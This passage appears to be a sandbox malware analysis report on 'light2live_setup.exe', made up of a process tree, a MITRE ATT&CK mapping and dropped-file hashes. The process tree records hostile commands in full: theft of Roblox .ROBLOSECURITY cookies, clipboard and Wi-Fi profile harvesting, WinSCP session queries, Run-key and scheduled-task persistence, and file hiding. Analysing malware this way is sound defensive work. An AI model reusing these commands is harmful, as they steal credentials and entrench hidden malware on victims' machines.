    PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
    3⤵
    PID:6156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
    3⤵
    PID:10744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
    3⤵
    PID:9036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
    3⤵
    PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
    3⤵
    PID:6260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
    3⤵
    PID:8920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
    3⤵
    PID:6700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
    3⤵
    PID:6012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
    3⤵
    PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
    3⤵
    PID:7128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
    3⤵
    PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
    3⤵
    PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
    3⤵
    PID:10124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
    3⤵
    PID:7208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
    3⤵
    PID:6628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
    3⤵
    PID:5996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
    3⤵
    PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
    3⤵
    PID:10520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
    3⤵
    PID:6884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
    3⤵
    PID:10612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
    3⤵
    PID:5344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
    3⤵
    PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
    3⤵
    PID:6620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
    3⤵
    PID:7272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
    3⤵
    PID:7652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:10044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\9wfOF4Lq1VJV.vbs"
    3⤵
    PID:10792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe\"""
    3⤵
    PID:6848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupL0uC6c /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe\" /F /rl highest"
    3⤵
    PID:10148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupL0uC6c /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe /f"
    3⤵
    PID:10140
- - C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe
    "C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2416 --field-trial-handle=1728,8289633007532998005,96070963887476729,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    PID:6236

C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=3796 get ExecutablePath
1⤵
PID:912

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:6516

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8552

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8716

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8972

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9256

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9412

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9636

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9716

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
1⤵
PID:9516

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9480

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9404

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9360

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9344

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9316

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9308

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9280

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9236

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9228

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9172

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9148

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9132

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9120

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:9112

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:9104

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8956

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8936

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8928

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8912

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8900

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8892

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8884

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8876

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8864

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8848

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8828

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8816

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8804

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8796

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8788

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8780

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8764

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8740

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8700

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8684

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8668

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8660

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8652

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8644

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8636

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8628

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8616

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8608

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8600

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8592

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8572

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8560

C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get size
1⤵
- Collects information from the system
PID:11820

C:\Windows\system32\more.com
more +1
1⤵
PID:11892

C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
1⤵
PID:11868

C:\Windows\system32\more.com
more +1
1⤵
PID:11984

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
1⤵
PID:11976

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
1⤵
PID:11948

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8544

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8536

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8524
- C:\Windows\system32\reg.exe
  C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
  2⤵
  PID:10272

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8516

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8500

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8492

C:\Windows\system32\more.com
more +1
1⤵
PID:12232

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
1⤵
PID:12224

C:\Windows\system32\more.com
more +1
1⤵
PID:4992

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
1⤵
- Detects videocard installed
PID:2596

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8484

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8472

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8464

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8452

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8444

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8436

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8420

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8408

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8400

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8392

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8384

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8372

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8364

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8356

C:\Windows\system32\net.exe
net session
1⤵
PID:8348

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8340

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8332

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8324

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8296

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8288

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8280

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8268

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8260

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8252

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8244

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8236

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8224

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8216

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:6940

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:5236

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1564

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:3032

C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\9wfOF4Lq1VJV.vbs
1⤵
PID:7832

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
1⤵
PID:9464

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
1⤵
PID:7288

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
1⤵
PID:5588

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
1⤵
PID:1140

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
1⤵
PID:8776

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
1⤵
PID:11956

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
1⤵
PID:7560

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
1⤵
PID:9472

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
1⤵
PID:6584

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
1⤵
PID:12036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\Hqi3r9BMTLet_temp.ps1"
1⤵
PID:7040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
1⤵
PID:5076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard
1⤵
PID:5884

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" wlan show profile
1⤵
PID:9900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
1⤵
PID:10708

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
1⤵
PID:9960

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
1⤵
PID:4948

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
1⤵
PID:10020

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
1⤵
PID:5708

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
1⤵
PID:7476

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
1⤵
PID:9820

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
1⤵
PID:8528

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
1⤵
PID:9396

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
1⤵
PID:8632

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
1⤵
PID:7564

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
1⤵
PID:9760

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
1⤵
PID:6216

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
1⤵
PID:9064

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
1⤵
PID:5984

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
1⤵
PID:5440

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
1⤵
PID:11760

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
1⤵
PID:4684

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
1⤵
PID:5756

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
1⤵
PID:7976

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
1⤵
PID:8468

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
1⤵
PID:5412

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
1⤵
PID:7492

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
1⤵
PID:8636

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
1⤵
PID:10880

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
1⤵
PID:9032

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe
1⤵
- Views/modifies file attributes
PID:8592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe\""
1⤵
PID:12040

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupL0uC6c /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe /f
1⤵
PID:11188

C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn WindowsDriverSetupL0uC6c /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe\" /F /rl highest
1⤵
- Creates scheduled task(s)
PID:11160

C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupL0uC6c /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\light2live_setup.exe\" /F /rl highest
1⤵
PID:11172

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

